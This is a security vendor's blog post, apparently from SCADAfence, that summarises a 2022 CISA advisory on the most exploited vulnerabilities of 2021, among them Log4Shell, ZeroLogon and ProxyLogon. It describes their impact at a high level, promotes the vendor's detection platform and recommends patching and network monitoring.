On April 27, the Cybersecurity and Infrastructure Security Agency (CISA), published a joint advisory in collaboration with CSA/NSA/FBI/ACSC and other cybersecurity authorities, providing details on the top 15 vulnerabilities routinely exploited by threat actors in 2021,and other CVEs frequently exploited.
Nine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, potentially allowing threat actors to remotely take over systems.
Unpatched devices and systems can serve as an easy network entry point for threat actors, as they provide attackers with a reliable and efficient Initial Access method. A number of these vulnerabilities were seen as a part of ransomware attack vectors, one of today’s top threats to operational technology.
Many of these vulnerabilities share characteristics that make them widely exploitable: They affect widely used systems, where the vulnerability can be present in multiple systems.
In the past year, threat actors targeted internet-facing systems, such as email servers and VPN servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, a proof of concept code was released within two weeks of the vulnerability’s disclosure. (Read more about when to patch or not patch, here).
Malicious threat actors continued exploiting publicly known vulnerabilities, demonstrating the continued risk to organizations that fail to patch software in a timely manner or are using software that is no longer supported by a vendor.
The Top 15 Routinely Exploited Vulnerabilities
The top vulnerabilities detail how threat actors exploited newly disclosed vulnerabilities in popular services, aiming to create a massive and extended impact on organizations.
Nine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses.
Following are the most exploited vulnerabilities:
- CVE-2021-44228 - this vulnerability, known as Log4Shell, affects the Apache Log4j library, an open-source logging framework. Exploiting this vulnerability allows threat actors to control java-based web servers and launch remote code execution attacks.
- CVE-2020-1472 - this vulnerability, known as ZeroLogon, affects Microsoft’s Active Directory Netlogon Remote Protocol. Exploiting this vulnerability allows an attacker to establish a vulnerable Netlogon secure channel connection to a domain controller.
- CVE-2019-11510 - this vulnerability affects Pulse Connect Secure. Successful exploitation of this vulnerability allows an unauthenticated remote attacker to perform an arbitrary file reading.
- CVE-2018-13379 - this vulnerability affects Fortinet’s FortiGate SSL VPN. Exploitation of this vulnerability could allow an unauthenticated attacker to read arbitrary files.
- CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065 - these vulnerabilities, known as ProxyLogon, affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities allows unauthenticated attackers to execute arbitrary code on vulnerable Exchange Servers and compromise trust and identity in a vulnerable network.
- CVE-2021-34523, CVE-2021-34473, CVE-2021-31207 - these vulnerabilities, known as ProxyShell, also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination enables a remote actor to execute arbitrary code.
As our customers are well aware, The SCADAfence IoT Platform protects against these vulnerabilities, detects any unexpected connections to and from external devices, and detects unexpected connections to and from the Internet. These connections would trigger alerts indicating a malicious threat actor might be attempting to exploit a vulnerability.
The platform also detects suspicious behavior based on IP reputation, hash reputation, and domain reputation.
The SCADAfence Platform can help identify where the network is exposed to potential risks and match between exposed assets and their relative vulnerabilities.
Additionally, the User Activity Analyzer can be utilized to track any propagation attempts by malicious actors.
Network Threat Detection: Exploitation Attempts
The SCADAfence Platform detects exploitation attempts of the following vulnerabilities:
- CVE-2021-44228 (Log4Shell) - this vulnerability was widely exploited, thousands of products use Log4j and were vulnerable to the Log4Shell exploitation.
- CVE-2020-1472 (ZeroLogon) - this vulnerability has been observed in the attack chain of ransomware actors such as Ryuk.
- CVE-2019-11510 (Pulse) - while patches for this vulnerability were released April 2019, multiple incidents have occurred where compromised AD credentials were used months after victim organizations patched their VPN appliance.
- CVE-2018-13379 (Fortinet) - this vulnerability has been exploited routinely for over four years, and has often been used to deploy ransomware.
The SCADAfence research team is constantly monitoring newly disclosed vulnerabilities, as well as routinely exploited ones, and working to continuously improve the platform's vulnerability network threat detection abilities.
Recommendations for Reducing Cybersecurity Risk
Our researchers recommend taking the following measures to minimize the risk of exploitation:
- Limit Network Exposure – minimize network exposure for all of your control system devices and/or systems, and ensure they are not accessible from the Internet.
- Monitor Network Traffic - monitor access to the production segments. In your network monitoring tool (and we know a really good one), create logical groups of the affected devices and define traffic rules to alert on suspicious access to them.
- Monitor User Activity – If you’re a customer, you can use the SCADAfence Platform to monitor access to the affected devices and track all of your user activities using the User Activity View.
- Connect to the SCADAfence Cloud – Again, If you’re a customer, connect your SCADAfence Platform to the SCADAfence Cloud to get the latest signature and CVE updates.
Additional recommendations include updating your software, operating systems, applications, and firmware on IT network assets in a timely manner, while prioritizing patching known exploited vulnerabilities.
If you’re not a customer yet and would like to see how this works from up close, you can watch a short OT & IoT security demo.